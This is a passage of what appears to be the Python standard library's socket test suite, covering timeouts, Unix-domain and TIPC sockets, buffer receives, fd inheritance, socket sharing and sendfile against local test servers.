    def _testTimeoutDefault(self):
        # passing no explicit timeout uses socket's global default
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(42)
        try:
            self.cli = socket.create_connection((HOST, self.port))
            self.addCleanup(self.cli.close)
        finally:
            # always restore the global default for later tests
            socket.setdefaulttimeout(None)
        self.assertEqual(self.cli.gettimeout(), 42)

    testTimeoutNone = _justAccept
    def _testTimeoutNone(self):
        # None timeout means the same as sock.settimeout(None)
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            self.cli = socket.create_connection((HOST, self.port), timeout=None)
            self.addCleanup(self.cli.close)
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(self.cli.gettimeout(), None)

    testTimeoutValueNamed = _justAccept
    def _testTimeoutValueNamed(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30)
        self.assertEqual(self.cli.gettimeout(), 30)

    testTimeoutValueNonamed = _justAccept
    def _testTimeoutValueNonamed(self):
        # Same as above but with the timeout passed positionally.
        self.cli = socket.create_connection((HOST, self.port), 30)
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
    """Timeout behaviour of sockets returned by create_connection()."""

    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)

    def testInsideTimeout(self):
        # Server side for both cases below: accept, wait 3 seconds,
        # then reply.
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        time.sleep(3)
        conn.send(b"done!")
    testOutsideTimeout = testInsideTimeout

    def _testInsideTimeout(self):
        # No timeout: recv() blocks until the server replies.
        self.cli = sock = socket.create_connection((HOST, self.port))
        data = sock.recv(5)
        self.assertEqual(data, b"done!")

    def _testOutsideTimeout(self):
        # 1-second timeout: the server only replies after 3 seconds,
        # so recv() must raise socket.timeout.
        self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
        self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
    """Timeout behaviour of blocking, non-blocking and signal-interrupted
    accept() on a TCP socket."""

    def testTCPTimeout(self):
        # accept() with a 1-second timeout and no incoming connection
        # must raise socket.timeout.
        def raise_timeout(*args, **kwargs):
            self.serv.settimeout(1.0)
            self.serv.accept()
        self.assertRaises(socket.timeout, raise_timeout,
                          "Error generating a timeout exception (TCP)")

    def testTimeoutZero(self):
        # Zero timeout == non-blocking: accept() must fail immediately
        # with a plain OSError, not socket.timeout.
        ok = False
        try:
            self.serv.settimeout(0.0)
            foo = self.serv.accept()
        except socket.timeout:
            self.fail("caught timeout instead of error (TCP)")
        except OSError:
            ok = True
        except:
            # Deliberate catch-all: any other exception is a failure.
            self.fail("caught unexpected exception (TCP)")
        if not ok:
            self.fail("accept() returned success when we did not expect it")

    @unittest.skipUnless(hasattr(signal, 'alarm'),
                         'test needs signal.alarm()')
    def testInterruptedTimeout(self):
        # XXX I don't know how to do this test on MSWindows or any other
        # platform that doesn't support signal.alarm() or os.kill(), though
        # the bug should have existed on all platforms.
        self.serv.settimeout(5.0)   # must be longer than alarm

        class Alarm(Exception):
            pass

        def alarm_handler(signal, frame):
            raise Alarm

        old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
        try:
            try:
                signal.alarm(2)    # POSIX allows alarm to be up to 1 second early
                foo = self.serv.accept()
            except socket.timeout:
                self.fail("caught timeout instead of Alarm")
            except Alarm:
                pass
            except:
                self.fail("caught other exception instead of Alarm:"
                          " %s(%s):\n%s" %
                          (sys.exc_info()[:2] + (traceback.format_exc(),)))
            else:
                self.fail("nothing caught")
            finally:
                signal.alarm(0)         # shut off alarm
        except Alarm:
            self.fail("got Alarm in wrong place")
        finally:
            # no alarm can be pending.  Safe to restore old handler.
            signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
    """Timeout behaviour of blocking and non-blocking UDP receives."""

    def testUDPTimeout(self):
        # recv() with a 1-second timeout and no incoming datagram must
        # raise socket.timeout.
        def raise_timeout(*args, **kwargs):
            self.serv.settimeout(1.0)
            self.serv.recv(1024)
        self.assertRaises(socket.timeout, raise_timeout,
                          "Error generating a timeout exception (UDP)")

    def testTimeoutZero(self):
        # Zero timeout == non-blocking: recv() must fail immediately
        # with a plain OSError, not socket.timeout.
        ok = False
        try:
            self.serv.settimeout(0.0)
            self.serv.recv(1024)
        except socket.timeout:
            self.fail("caught timeout instead of error (UDP)")
        except OSError:
            ok = True
        except:
            # Deliberate catch-all: any other exception is a failure.
            self.fail("caught unexpected exception (UDP)")
        if not ok:
            self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
    """Verify the socket exception hierarchy and error propagation on a
    socket whose underlying file descriptor has become invalid."""

    def testExceptionTree(self):
        # All socket-specific exceptions derive from OSError, which in
        # turn derives from Exception.
        self.assertTrue(issubclass(OSError, Exception))
        for exc in (socket.herror, socket.gaierror, socket.timeout):
            self.assertTrue(issubclass(exc, OSError))

    def test_setblocking_invalidfd(self):
        # Regression test for issue #28471
        sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        sock = socket.socket(
            socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
        sock0.close()
        self.addCleanup(sock.detach)

        with self.assertRaises(OSError):
            sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
    """AF_UNIX sockets bound in the Linux abstract namespace (addresses
    starting with a NUL byte; no filesystem entry is created)."""

    # Address length limit: 108 bytes are accepted, 109 rejected
    # (see testMaxName / testNameOverflow below).
    UNIX_PATH_MAX = 108

    def testLinuxAbstractNamespace(self):
        address = b"\x00python-test-hello\x00\xff"
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
            s1.bind(address)
            s1.listen()
            with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
                s2.connect(s1.getsockname())
                with s1.accept()[0] as s3:
                    self.assertEqual(s1.getsockname(), address)
                    self.assertEqual(s2.getpeername(), address)

    def testMaxName(self):
        # An address of exactly UNIX_PATH_MAX bytes must be accepted.
        address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
            s.bind(address)
            self.assertEqual(s.getsockname(), address)

    def testNameOverflow(self):
        # One byte longer than UNIX_PATH_MAX must be rejected.
        address = "\x00" + "h" * self.UNIX_PATH_MAX
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
            self.assertRaises(OSError, s.bind, address)

    def testStrName(self):
        # Check that an abstract name can be passed as a string.
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            s.bind("\x00python\x00test\x00")
            self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
        finally:
            s.close()

    def testBytearrayName(self):
        # Check that an abstract name can be passed as a bytearray.
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
            s.bind(bytearray(b"\x00python\x00test\x00"))
            self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
    """Binding AF_UNIX sockets to filesystem pathnames in various
    encodings (str, bytes, surrogateescape, unencodable)."""

    def setUp(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

    def tearDown(self):
        self.sock.close()

    def encoded(self, path):
        # Return the given path encoded in the file system encoding,
        # or skip the test if this is not possible.
        try:
            return os.fsencode(path)
        except UnicodeEncodeError:
            self.skipTest(
                "Pathname {0!a} cannot be represented in file "
                "system encoding {1!r}".format(
                    path, sys.getfilesystemencoding()))

    def bind(self, sock, path):
        # Bind the socket
        try:
            support.bind_unix_socket(sock, path)
        except OSError as e:
            # Paths exceeding the platform limit are a skip, not a
            # failure; anything else is re-raised.
            if str(e) == "AF_UNIX path too long":
                self.skipTest(
                    "Pathname {0!a} is too long to serve as an AF_UNIX path"
                    .format(path))
            else:
                raise

    def testUnbound(self):
        # Issue #30205 (note getsockname() can return None on OS X)
        self.assertIn(self.sock.getsockname(), ('', None))

    def testStrAddr(self):
        # Test binding to and retrieving a normal string pathname.
        path = os.path.abspath(support.TESTFN)
        self.bind(self.sock, path)
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testBytesAddr(self):
        # Test binding to a bytes pathname.
        path = os.path.abspath(support.TESTFN)
        self.bind(self.sock, self.encoded(path))
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testSurrogateescapeBind(self):
        # Test binding to a valid non-ASCII pathname, with the
        # non-ASCII bytes supplied using surrogateescape encoding.
        path = os.path.abspath(support.TESTFN_UNICODE)
        b = self.encoded(path)
        self.bind(self.sock, b.decode("ascii", "surrogateescape"))
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testUnencodableAddr(self):
        # Test binding to a pathname that cannot be encoded in the
        # file system encoding.
        if support.TESTFN_UNENCODABLE is None:
            self.skipTest("No unencodable filename available")
        path = os.path.abspath(support.TESTFN_UNENCODABLE)
        self.bind(self.sock, path)
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
    """
    Test the buffer versions of socket.recv() and socket.send():
    recv_into() / recvfrom_into() with array, bytearray and memoryview
    targets.
    """
    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)

    def testRecvIntoArray(self):
        # recv_into() an array.array buffer.
        buf = array.array("B", [0] * len(MSG))
        nbytes = self.cli_conn.recv_into(buf)
        self.assertEqual(nbytes, len(MSG))
        buf = buf.tobytes()
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    def _testRecvIntoArray(self):
        buf = bytes(MSG)
        self.serv_conn.send(buf)

    def testRecvIntoBytearray(self):
        # recv_into() a bytearray buffer.
        buf = bytearray(1024)
        nbytes = self.cli_conn.recv_into(buf)
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvIntoBytearray = _testRecvIntoArray

    def testRecvIntoMemoryview(self):
        # recv_into() a memoryview wrapping a bytearray.
        buf = bytearray(1024)
        nbytes = self.cli_conn.recv_into(memoryview(buf))
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvIntoMemoryview = _testRecvIntoArray

    def testRecvFromIntoArray(self):
        buf = array.array("B", [0] * len(MSG))
        nbytes, addr = self.cli_conn.recvfrom_into(buf)
        self.assertEqual(nbytes, len(MSG))
        buf = buf.tobytes()
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    def _testRecvFromIntoArray(self):
        buf = bytes(MSG)
        self.serv_conn.send(buf)

    def testRecvFromIntoBytearray(self):
        buf = bytearray(1024)
        nbytes, addr = self.cli_conn.recvfrom_into(buf)
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvFromIntoBytearray = _testRecvFromIntoArray

    def testRecvFromIntoMemoryview(self):
        buf = bytearray(1024)
        nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvFromIntoMemoryview = _testRecvFromIntoArray

    def testRecvFromIntoSmallBuffer(self):
        # See issue #20246: requesting more bytes than the buffer holds
        # must raise ValueError rather than overflow the buffer.
        buf = bytearray(8)
        self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)

    def _testRecvFromIntoSmallBuffer(self):
        self.serv_conn.send(MSG)

    def testRecvFromIntoEmptyBuffer(self):
        # A zero-length buffer is valid and simply receives nothing.
        buf = bytearray()
        self.cli_conn.recvfrom_into(buf)
        self.cli_conn.recvfrom_into(buf, 0)
    _testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
# Parameters of the TIPC name sequence used by the TIPC tests below.
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
    """Check if the TIPC module is loaded

    The TIPC module is not loaded automatically on Ubuntu and probably
    other Linux distros.
    """
    # Without AF_TIPC in the socket module there is nothing to test.
    if not hasattr(socket, "AF_TIPC"):
        return False
    try:
        modules = open("/proc/modules")
    except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory or if we
        # have not the permission to read it.
        return False
    # The module list has one "name size refcount ..." entry per line;
    # TIPC is loaded iff some line starts with "tipc ".
    with modules:
        return any(entry.startswith("tipc ") for entry in modules)
@unittest.skipUnless(isTipcAvailable(),
                     "TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
    # Datagram (SOCK_RDM) round-trip over a TIPC name sequence.

    def testRDM(self):
        srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
        cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
        self.addCleanup(srv.close)
        self.addCleanup(cli.close)

        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
                   TIPC_LOWER, TIPC_UPPER)
        srv.bind(srvaddr)

        # Send to a single name in the middle of the bound sequence.
        sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
                    TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
        cli.sendto(MSG, sendaddr)

        msg, recvaddr = srv.recvfrom(1024)
        self.assertEqual(cli.getsockname(), recvaddr)
        self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
                     "TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
    # Stream (SOCK_STREAM) round-trip over TIPC using the two-thread
    # ThreadableTest harness: setUp() is the server side, clientSetUp()
    # runs in the client thread.

    def __init__(self, methodName = 'runTest'):
        unittest.TestCase.__init__(self, methodName = methodName)
        ThreadableTest.__init__(self)

    def setUp(self):
        self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
        self.addCleanup(self.srv.close)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
                   TIPC_LOWER, TIPC_UPPER)
        self.srv.bind(srvaddr)
        self.srv.listen()
        # Let the client thread proceed before blocking in accept().
        self.serverExplicitReady()
        self.conn, self.connaddr = self.srv.accept()
        self.addCleanup(self.conn.close)

    def clientSetUp(self):
        # There is a hittable race between serverExplicitReady() and the
        # accept() call; sleep a little while to avoid it, otherwise
        # we could get an exception
        time.sleep(0.1)
        self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
        self.addCleanup(self.cli.close)
        addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
                TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
        self.cli.connect(addr)
        self.cliaddr = self.cli.getsockname()

    def testStream(self):
        msg = self.conn.recv(1024)
        self.assertEqual(msg, MSG)
        self.assertEqual(self.cliaddr, self.connaddr)

    def _testStream(self):
        self.cli.send(MSG)
        self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
    # Verify socket objects work as context managers: leaving the
    # `with` block closes the socket (sock._closed becomes True).

    def _testSocketClass(self):
        # base test
        with socket.socket() as sock:
            self.assertFalse(sock._closed)
        self.assertTrue(sock._closed)
        # close inside with block
        with socket.socket() as sock:
            sock.close()
        self.assertTrue(sock._closed)
        # exception inside with block
        with socket.socket() as sock:
            self.assertRaises(OSError, sock.sendall, b'foo')
        self.assertTrue(sock._closed)

    def testCreateConnectionBase(self):
        # Server side: echo one payload back.
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        data = conn.recv(1024)
        conn.sendall(data)

    def _testCreateConnectionBase(self):
        address = self.serv.getsockname()
        with socket.create_connection(address) as sock:
            self.assertFalse(sock._closed)
            sock.sendall(b'foo')
            self.assertEqual(sock.recv(1024), b'foo')
        self.assertTrue(sock._closed)

    def testCreateConnectionClose(self):
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        data = conn.recv(1024)
        conn.sendall(data)

    def _testCreateConnectionClose(self):
        address = self.serv.getsockname()
        with socket.create_connection(address) as sock:
            sock.close()
        self.assertTrue(sock._closed)
        # Using a closed socket must fail.
        self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
    # Socket file descriptors must be non-inheritable by default
    # (PEP 446); these tests cover the inheritable flag APIs.

    @unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
                         "SOCK_CLOEXEC not defined")
    @support.requires_linux_version(2, 6, 28)
    def test_SOCK_CLOEXEC(self):
        # SOCK_CLOEXEC must be masked out of .type and make the fd
        # non-inheritable.
        with socket.socket(socket.AF_INET,
                           socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertFalse(s.get_inheritable())

    def test_default_inheritable(self):
        sock = socket.socket()
        with sock:
            self.assertEqual(sock.get_inheritable(), False)

    def test_dup(self):
        # dup() must preserve the non-inheritable default.
        sock = socket.socket()
        with sock:
            newsock = sock.dup()
            sock.close()
            with newsock:
                self.assertEqual(newsock.get_inheritable(), False)

    def test_set_inheritable(self):
        sock = socket.socket()
        with sock:
            sock.set_inheritable(True)
            self.assertEqual(sock.get_inheritable(), True)

            sock.set_inheritable(False)
            self.assertEqual(sock.get_inheritable(), False)

    @unittest.skipIf(fcntl is None, "need fcntl")
    def test_get_inheritable_cloexec(self):
        # get_inheritable() must reflect an FD_CLOEXEC change made
        # directly through fcntl.
        sock = socket.socket()
        with sock:
            fd = sock.fileno()
            self.assertEqual(sock.get_inheritable(), False)

            # clear FD_CLOEXEC flag
            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
            flags &= ~fcntl.FD_CLOEXEC
            fcntl.fcntl(fd, fcntl.F_SETFD, flags)

            self.assertEqual(sock.get_inheritable(), True)

    @unittest.skipIf(fcntl is None, "need fcntl")
    def test_set_inheritable_cloexec(self):
        # set_inheritable() must toggle the underlying FD_CLOEXEC bit.
        sock = socket.socket()
        with sock:
            fd = sock.fileno()
            self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
                             fcntl.FD_CLOEXEC)

            sock.set_inheritable(True)
            self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
                             0)

    def test_socketpair(self):
        s1, s2 = socket.socketpair()
        self.addCleanup(s1.close)
        self.addCleanup(s2.close)
        self.assertEqual(s1.get_inheritable(), False)
        self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
                     "SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
    # Interplay of SOCK_NONBLOCK, settimeout()/setblocking() and the
    # O_NONBLOCK fd flag.

    def checkNonblock(self, s, nonblock=True, timeout=0.0):
        # Assert socket `s` is in the expected blocking state.
        if nonblock:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertEqual(s.gettimeout(), timeout)
            self.assertTrue(
                fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
            if timeout == 0:
                # timeout == 0: means that getblocking() must be False.
                self.assertFalse(s.getblocking())
            else:
                # If timeout > 0, the socket will be in a "blocking" mode
                # from the standpoint of the Python API.  For Python socket
                # object, "blocking" means that operations like 'sock.recv()'
                # will block.  Internally, file descriptors for
                # "blocking" Python sockets *with timeouts* are in a
                # *non-blocking* mode, and 'sock.recv()' uses 'select()'
                # and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
                self.assertTrue(s.getblocking())
        else:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertEqual(s.gettimeout(), None)
            self.assertFalse(
                fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
            self.assertTrue(s.getblocking())

    @support.requires_linux_version(2, 6, 28)
    def test_SOCK_NONBLOCK(self):
        # a lot of it seems silly and redundant, but I wanted to test that
        # changing back and forth worked ok
        with socket.socket(socket.AF_INET,
                           socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
            self.checkNonblock(s)
            s.setblocking(1)
            self.checkNonblock(s, nonblock=False)
            s.setblocking(0)
            self.checkNonblock(s)
            s.settimeout(None)
            self.checkNonblock(s, nonblock=False)
            s.settimeout(2.0)
            self.checkNonblock(s, timeout=2.0)
            s.setblocking(1)
            self.checkNonblock(s, nonblock=False)
        # defaulttimeout: newly created sockets must pick it up.
        t = socket.getdefaulttimeout()
        socket.setdefaulttimeout(0.0)
        with socket.socket() as s:
            self.checkNonblock(s)
        socket.setdefaulttimeout(None)
        with socket.socket() as s:
            self.checkNonblock(s, False)
        socket.setdefaulttimeout(2.0)
        with socket.socket() as s:
            self.checkNonblock(s, timeout=2.0)
        socket.setdefaulttimeout(None)
        with socket.socket() as s:
            self.checkNonblock(s, False)
        # Restore the process-wide default.
        socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
    # Tests for Windows socket.share()/socket.fromshare() (WSADuplicateSocket).

    # This must be classmethod and not staticmethod or multiprocessing
    # won't be able to bootstrap it.
    @classmethod
    def remoteProcessServer(cls, q):
        # Recreate socket from shared data
        sdata = q.get()
        message = q.get()

        s = socket.fromshare(sdata)
        s2, c = s.accept()

        # Send the message
        s2.sendall(message)
        s2.close()
        s.close()

    def testShare(self):
        # Transfer the listening server socket to another process
        # and service it from there.

        # Create process:
        q = multiprocessing.Queue()
        p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
        p.start()

        # Get the shared socket data
        data = self.serv.share(p.pid)

        # Pass the shared socket to the other process
        addr = self.serv.getsockname()
        self.serv.close()
        q.put(data)

        # The data that the server will send us
        message = b"slapmahfro"
        q.put(message)

        # Connect
        s = socket.create_connection(addr)
        #  listen for the data
        m = []
        while True:
            data = s.recv(100)
            if not data:
                break
            m.append(data)
        s.close()
        received = b"".join(m)
        self.assertEqual(received, message)
        p.join()

    def testShareLength(self):
        # fromshare() must reject truncated or over-long share data.
        data = self.serv.share(os.getpid())
        self.assertRaises(ValueError, socket.fromshare, data[:-1])
        self.assertRaises(ValueError, socket.fromshare, data+b"foo")

    def compareSockets(self, org, other):
        # socket sharing is expected to work only for blocking socket
        # since the internal python timeout value isn't transferred.
        self.assertEqual(org.gettimeout(), None)
        self.assertEqual(org.gettimeout(), other.gettimeout())

        self.assertEqual(org.family, other.family)
        self.assertEqual(org.type, other.type)
        # If the user specified "0" for proto, then
        # internally windows will have picked the correct value.
        # Python introspection on the socket however will still return
        # 0.  For the shared socket, the python value is recreated
        # from the actual value, so it may not compare correctly.
        if org.proto != 0:
            self.assertEqual(org.proto, other.proto)

    def testShareLocal(self):
        data = self.serv.share(os.getpid())
        s = socket.fromshare(data)
        try:
            self.compareSockets(self.serv, s)
        finally:
            s.close()

    def testTypes(self):
        # share()/fromshare() round-trip for every supported
        # family/type combination.
        families = [socket.AF_INET, socket.AF_INET6]
        types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
        for f in families:
            for t in types:
                try:
                    source = socket.socket(f, t)
                except OSError:
                    continue # This combination is not supported
                try:
                    data = source.share(os.getpid())
                    shared = socket.fromshare(data)
                    try:
                        self.compareSockets(source, shared)
                    finally:
                        shared.close()
                finally:
                    source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
    """
    Test the send() implementation of socket.sendfile().
    """
    # Methods come in client/server pairs: _testX runs in the client
    # thread and sends, testX runs in the server thread and verifies.
    FILESIZE = (10 * 1024 * 1024)  # 10 MiB
    BUFSIZE = 8192
    FILEDATA = b""
    TIMEOUT = 2

    @classmethod
    def setUpClass(cls):
        # Create a FILESIZE-byte test file of random ASCII letters once
        # for the whole class; FILEDATA caches its contents.
        def chunks(total, step):
            assert total >= step
            while total > step:
                yield step
                total -= step
            if total:
                yield total

        chunk = b"".join([random.choice(string.ascii_letters).encode()
                          for i in range(cls.BUFSIZE)])
        with open(support.TESTFN, 'wb') as f:
            for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
                f.write(chunk)
        with open(support.TESTFN, 'rb') as f:
            cls.FILEDATA = f.read()
            assert len(cls.FILEDATA) == cls.FILESIZE

    @classmethod
    def tearDownClass(cls):
        support.unlink(support.TESTFN)

    def accept_conn(self):
        # Accept a client connection with a test-wide timeout applied.
        self.serv.settimeout(MAIN_TIMEOUT)
        conn, addr = self.serv.accept()
        conn.settimeout(self.TIMEOUT)
        self.addCleanup(conn.close)
        return conn

    def recv_data(self, conn):
        # Drain the connection until EOF and return everything received.
        received = []
        while True:
            chunk = conn.recv(self.BUFSIZE)
            if not chunk:
                break
            received.append(chunk)
        return b''.join(received)

    def meth_from_sock(self, sock):
        # Depending on the mixin class being run return either send()
        # or sendfile() method implementation.
        return getattr(sock, "_sendfile_use_send")

    # regular file
    def _testRegularFile(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, self.FILESIZE)
            self.assertEqual(file.tell(), self.FILESIZE)

    def testRegularFile(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # non regular file
    def _testNonRegularFile(self):
        # sendfile() on a BytesIO must fall back to send(); the raw
        # os.sendfile() path must refuse it.
        address = self.serv.getsockname()
        file = io.BytesIO(self.FILEDATA)
        with socket.create_connection(address) as sock, file as file:
            sent = sock.sendfile(file)
            self.assertEqual(sent, self.FILESIZE)
            self.assertEqual(file.tell(), self.FILESIZE)
            self.assertRaises(socket._GiveupOnSendfile,
                              sock._sendfile_use_sendfile, file)

    def testNonRegularFile(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # empty file
    def _testEmptyFileSend(self):
        address = self.serv.getsockname()
        filename = support.TESTFN + "2"
        with open(filename, 'wb'):
            self.addCleanup(support.unlink, filename)
        file = open(filename, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, 0)
            self.assertEqual(file.tell(), 0)

    def testEmptyFileSend(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(data, b"")

    # offset
    def _testOffset(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file, offset=5000)
            self.assertEqual(sent, self.FILESIZE - 5000)
            self.assertEqual(file.tell(), self.FILESIZE)

    def testOffset(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE - 5000)
        self.assertEqual(data, self.FILEDATA[5000:])

    # count
    def _testCount(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 5000007
            meth = self.meth_from_sock(sock)
            sent = meth(file, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count)

    def testCount(self):
        count = 5000007
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[:count])

    # count small
    def _testCountSmall(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 1
            meth = self.meth_from_sock(sock)
            sent = meth(file, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count)

    def testCountSmall(self):
        count = 1
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[:count])

    # count + offset
    def _testCountWithOffset(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 100007
            meth = self.meth_from_sock(sock)
            sent = meth(file, offset=2007, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count + 2007)

    def testCountWithOffset(self):
        count = 100007
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[2007:count+2007])

    # non blocking sockets are not supposed to work
    def _testNonBlocking(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            sock.setblocking(False)
            meth = self.meth_from_sock(sock)
            self.assertRaises(ValueError, meth, file)
            self.assertRaises(ValueError, sock.sendfile, file)

    def testNonBlocking(self):
        conn = self.accept_conn()
        if conn.recv(8192):
            self.fail('was not supposed to receive any data')

    # timeout (non-triggered)
    def _testWithTimeout(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, self.FILESIZE)

    def testWithTimeout(self):
